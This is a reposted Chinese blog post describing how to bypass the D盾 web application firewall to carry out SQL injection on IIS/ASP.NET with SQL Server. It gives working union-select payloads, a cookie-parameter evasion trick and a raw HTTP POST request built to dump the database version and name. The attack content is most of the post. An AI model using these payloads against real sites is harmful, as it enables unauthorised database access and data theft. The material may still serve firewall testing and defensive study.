专栏首页小白帽学习之路最新绕过D盾注入方法分享(学姿势)

最新绕过D盾注入方法分享(学姿势)

测试环境

  • 测试版本:D盾 v2.1.4.4(测试版)
  • 环境:iis7.5+SQLserver 2012

方法一:SQL语句拦截

www.d123.com/news.aspx?id=1 union select
  • aspx 代码是用 Request.Params 获取参数,所以可以获取 COOKIE GET POST 这三种方法参数的值。
string id = Request.Params[“id”];
  • 而且获取参数具有优先级
cookie->post->get
  • D盾是没有拦截 Cookie 参数可以绕过
-1 union select 1,db_name(),@@version
  • 测试:绕过获取数据库信息

本文由“壹伴编辑器”提供技术支持

方法二

string id = Request.Params[“id”];
  • aspx 传入的参数如果重复系统会进行拼接,id=1&id=2 会等价于 id=1,2
Asp.net + iis:id=1,2,3
  • 测试:
POST /news.aspx?id=1.8eunion/ 
HTTP/1.1 
Host: www.d123.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Connection: close 
Cookie: _d_id=4400020b0469c82ad109c2a344f34a

Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 40 id=%001/select 1,@@version,db_name()–

本文分享自微信公众号 - 程序员阿甘(gh_a2e36d69d566),作者:TORYS

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-05-01

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • SQL注入绕过(第二弹)

    1.还是找规律 order不拦截,orderby组合在一起就会被拦截。这里我正好想到上次bypass一个报错注入的手法,就是一个简单的换行,这里要是不懂。可以去...

    7089bAt@PowerLi
  • Kali Linux Web渗透测试手册(第二版) - 6.4 - 基于错误的SQL注入

    在上一个章节中,我们检测到了一个SQLi。 在本文中,我们将利用该漏洞并使用它从数据库中提取信息。

    7089bAt@PowerLi
  • 安全狗 {safedog} 最新版注入bypass

    https://pan.baidu.com/s/1QdqaDhZvio2KCQ3Uz3IVeA

    7089bAt@PowerLi
  • 通过错误的sql来测试推理sql的解析过程(二) (r8笔记第7天)

    之前总结过一篇 通过错误的sql来测试推理sql的解析过程 也算是以毒攻毒,当然也分析出来一些有意思的内容来,让原本看起来枯燥的内容有了更多的实践意义。 ...

    jeanron100
  • MyBatis学习总结(三)——多表关联查询与动态SQL

    假定一个员工(emp)拥有一个登录用户(user),员工与用户表之间是一对一关系:

    张果
  • PHP获取数据库表中的数据插入新的表再原删除数据方法

    砸漏
  • TP踩过的坑[修改功能]前台要给input加上隐藏属性

    简单、
  • column 'id' in field list is ambiguous

    column 'id' in field list is ambiguous  这个错误,是因为你查询语句里面有id字段的时候,没有说明是哪个表的id字段,应...

    闵开慧
  • Dart-Aqueduct框架开发(四)

    这篇文章将详细介绍URL、路由,前几篇有小伙伴私信留言说讲得有点快,感觉跟不上,所以,接下来的文章中,将详细介绍Aqueduct的相关内容.

    rhyme_lph
  • 一次搞懂滚动加载

    分页加载通常适用于客户端,通常是为了防止一次返回导致客户端崩溃,所以采用下拉加载更多的方式,为了防止数据重复的现象,数据传递建议使用唯一标识id。 普...

    用户5166556

扫码关注云+社区

领取腾讯云代金券